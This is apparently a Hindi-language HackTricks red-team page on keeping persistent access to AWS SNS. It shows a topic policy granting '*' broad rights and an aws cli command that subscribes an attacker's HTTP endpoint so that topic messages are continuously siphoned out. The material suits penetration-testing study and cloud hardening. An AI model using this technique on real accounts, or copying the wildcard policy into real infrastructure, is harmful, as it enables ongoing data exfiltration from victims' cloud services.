AWS - SNS Persistence

AWS हैकिंग सीखें शून्य से नायक तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

SNS

अधिक जानकारी के लिए देखें:

pageAWS - SNS Enum

स्थायित्व

SNS टॉपिक बनाते समय आपको एक IAM पॉलिसी के साथ इंगित करना होता है किसे पढ़ने और लिखने की पहुंच है। बाहरी खातों, ARN ऑफ रोल्स, या यहां तक कि "*" को इंगित करना संभव है। निम्नलिखित पॉलिसी AWS में सभी को MySNS.fifo नामक SNS टॉपिक में पढ़ने और लिखने की पहुंच देती है:

{
"Version": "2008-10-17",
"Id": "__default_policy_ID",
"Statement": [
{
"Sid": "__default_statement_ID",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": [
"SNS:Publish",
"SNS:RemovePermission",
"SNS:SetTopicAttributes",
"SNS:DeleteTopic",
"SNS:ListSubscriptionsByTopic",
"SNS:GetTopicAttributes",
"SNS:AddPermission",
"SNS:Subscribe"
],
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo",
"Condition": {
"StringEquals": {
"AWS:SourceOwner": "318142138553"
}
}
},
{
"Sid": "__console_pub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Publish",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
},
{
"Sid": "__console_sub_0",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "SNS:Subscribe",
"Resource": "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
}

सब्सक्राइबर्स बनाएं

सभी टॉपिक्स से सभी संदेशों को निरंतर बाहर निकालने के लिए, हमलावर सभी टॉपिक्स के लिए सब्सक्राइबर्स बना सकता है

ध्यान दें कि अगर टॉपिक FIFO प्रकार का है, तो केवल SQS प्रोटोकॉल का उपयोग करने वाले सब्सक्राइबर्स ही इस्तेमाल किए जा सकते हैं।

aws sns subscribe --region <region> \
--protocol http \
--notification-endpoint http://<attacker>/ \
--topic-arn <arn>
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!

HackTricks का समर्थन करने के अन्य तरीके:

Last updated